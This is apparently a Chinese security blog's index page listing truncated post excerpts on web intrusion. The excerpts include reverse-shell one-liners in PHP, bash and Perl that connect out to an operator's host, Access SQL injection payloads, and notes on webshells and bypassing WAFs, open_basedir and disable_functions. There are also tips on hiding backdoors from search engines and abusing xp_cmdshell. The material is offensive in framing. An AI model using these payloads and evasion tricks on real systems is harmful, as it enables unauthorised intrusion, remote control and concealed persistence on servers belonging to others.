eT48_Sec

每天只有24小时,所以你需要提高工作效率。

利用systeminfo命令查找可用的windows提权EXP

利用systeminfo命令查找可用的windows提权EXP,输出的即为未打补丁的漏洞。 文章根据网络上的相关内容做了一点修改(更新) systeminfo>tmp.txt&(for /f %i in (MS.txt) do @type tmp.txt|@find /i &q...

2015-03-30 17:38:52

阅读数 2903

评论数 0

使用sqlmap 代替access 注入中转

背景:测试站点是ASP的程序,经测试 shownews.asp?id=61存在注入 GET方法 shownews.asp?id=61 and 4>1 返回警告 改成POST方法,仍然出现警告 最后,测试cookie注入,如下图,在控制台提交document.cookie=&qu...

2015-03-14 23:40:35

阅读数 1282

评论数 0

access 偏移注入 案例

news.asp?id=3039 and 4>8 union select 1,2,3,4,* from manage_admin as a inner join manage_admin as b on a.id=b.id 看个案例就明白是什么意思了 先是背景 news.asp?id=33...

2015-03-14 20:44:42

阅读数 680

评论数 0

一条命令引发的思考

这条命令是 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i &3 2>&3");' 作用是反弹一个交互式的shell 代码看得不太懂,所以很有必要了解一下。 -i in...

2015-02-10 22:14:24

阅读数 296

评论数 0

php-reverse-shell

功能: 返回一个交互式的shell 使用: 先修改脚本中的两个变量 $ip 和 $port 为自己所需的。然后本地监听 $port 。例如: $ip = '192.168.1.111'; // CHANGE THIS $port = 13123; // CHANGE THIS nc -v -l -...

2015-02-10 18:40:39

阅读数 419

评论数 0

Reverse Shell Cheat Sheet

1.bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 2.perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREA...

2015-02-09 22:03:35

阅读数 541

评论数 0

反弹 shell 脚本

从大马里面提取出来的,分别用perl 和 C实现 。 保存为reverse_exp,然后执行perl ./reverse_exp 192.168.1.111 13123。 在192.168.1.111 上执行 nc -v -l -p 13123 #!/usr/bin/perl u...

2015-02-09 21:42:08

阅读数 329

评论数 0

PHP 5.x Shellshock Exploit (bypass disable_functions)

# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) ...

2015-02-07 22:46:03

阅读数 486

评论数 0

PHP disable_function与safe mode

我只想执行操作系统命令,可是有disable_functions 和 安全模式的阻碍。 disable_functions 本指令允许你基于安全原因禁止某些函数,从 PHP 4.0.1 起可用。其默认值为空,接受逗号分隔的函数名列表作为参数。 disable_functions 不受安全模式的影...

2015-02-07 21:00:35

阅读数 857

评论数 0

bypass open_basedir

在了解symlink() bypass open_basedir 的原理后,自己写的代码。在kali-Linux 上测试通过,Windows在路径的处理上需要修改一下。 <?php /* titile: bypass open_basedir auth: eT48 */ header(&...

2015-02-06 16:54:01

阅读数 449

评论数 0

PHP扫描内网存活主机

直接上代码 <?PHP header('Content-Type: text/html; charset=utf-8'); error_reporting(0); function ping($host, $timeout = 1) { $package = "\x0...

2015-02-01 22:27:28

阅读数 1005

评论数 0

菜刀杀狗

中转是一种思路,把狗拦截的关键字以一种等效的方式替换为其他的。 <?php $webshell="http://www.example.com/1.php";//把这里改成你的shell地址 $webshell=$webshell."?&11410...

2015-01-29 21:15:51

阅读数 396

评论数 0

通过“Robots <META> tag”防止搜索引擎收录网页后门

这是我这b374k.php上看到的。 我们通过“Robots tag”来告诉搜索引擎spider不要索引页面的内容以及不扫描页面中的链接。这样他人就不能通过搜索关键字的方式找到我们的网页后门了。 还可以再加一个“noarchive”属性防止搜索引擎保存网页的快照。 参考:h...

2015-01-27 20:38:01

阅读数 352

评论数 0

bypass waf 进行post注入

原标题:轻松绕各种WAF的POST注入、跨站防御(比如安全狗) 轻松绕各种WAF的POST注入、跨站防御(比如安全狗) File: ID: ...

2015-01-13 21:13:40

阅读数 412

评论数 0

php-文件上传

简单的编程,只为学习PHP。 <?php header("Content-Type:text/html; charset=utf-8"); error_reporting(0); print<<<END 文件上传实例 END; ...

2015-01-13 16:01:11

阅读数 286

评论数 0

php-批量端口扫描

phpwebshell端口扫描 <?php /* auth: eT48 blog: http://blog.csdn.net/et48_sec */ header('Content-Type: text/html; charset=utf-8'); error_reporting(0); ...

2015-01-13 14:40:36

阅读数 600

评论数 0

PHP实现目录遍历

目录遍历是文件管理的基础,在此基础上增加删除,新建,编辑,下载,浏览就更好了。 <?php header('Content-Type:text/html; charset=gb2312'); error_reporting(0); $dir=$_GET['dir']; if(is_dir(...

2015-01-12 16:34:51

阅读数 388

评论数 0

MSSQL-xp_cmdshell 的利用

一.关于xp_cmdshell xp_cmdshell是用于执行Windows命令的一个扩展存储过程。 xp_cmdshell 生成的 Windows 进程与 SQL Server 服务帐户具有相同的安全权限。  自SQL Server 2000后,默认情况下,xp_cmdshell 选项在新安装...

2015-01-08 12:48:48

阅读数 403

评论数 0

symlink() open_basedir bypass 原理分析

之前在网上看到相关php open_basedir bypass的文章都不是很理解,看了原作者的文章后总算明白了。 原文:http://cxsecurity.com/issue/WLB-2009110068 ok,先来了解一下什么是open_basedir。 open_basedir 将 PH...

2015-01-05 22:47:05

阅读数 894

评论数 0

使用include实现php一句话

我是菜牛各位看官轻喷。 PHP一句话主要实现的是,动态执行PHP代码。 PHP小马主要实现的是,文件上传。 PHP大马主要实现的是,提权。 include 语句包含并运行指定文件。  <?php //服务端 if(!empty($_POST['code'])){ $...

2015-01-05 15:57:03

阅读数 346

评论数 0

提示
确定要删除当前文章?
取消 删除
关闭
关闭